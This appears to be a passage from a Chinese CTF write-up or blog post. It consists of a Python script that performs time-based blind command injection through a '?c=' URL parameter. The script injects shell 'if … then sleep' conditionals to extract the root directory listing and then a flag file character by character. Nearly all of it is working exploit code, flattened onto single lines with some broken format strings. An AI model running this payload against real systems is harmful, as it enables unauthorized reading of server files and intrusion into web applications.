for i in range(1, 5): for j in range(1, 68): for k in range(32, 128): k = chr(k) payload = "?c=" + "if [ `ls / | awk NR=={} | cut -c {}` == {} ]; then sleep 2;fi".format(i,j,k) try: requests.get(url=url + payload, timeout=(1.5, 1.5)) except: p_result += k print("【-】 ls /盲注:]".format(j)) print("【*】 p_result is context") print(p_result)
for i in range(1, 5): for j in range(1, 68): for k in range(32, 128): k = chr(k) payload = "?c=" + "if [ `cat /f149_15_h3r3 | awk NR=={} | cut -c {}` == {} ]; then sleep 2;fi".format(i,j,k) try: requests.get(url=url + payload, timeout=(1.5, 1.5)) except: p_result += k print("【-】 ls /盲注:]".format(j)) print("【*】 p_result is context") print(p_result)
评论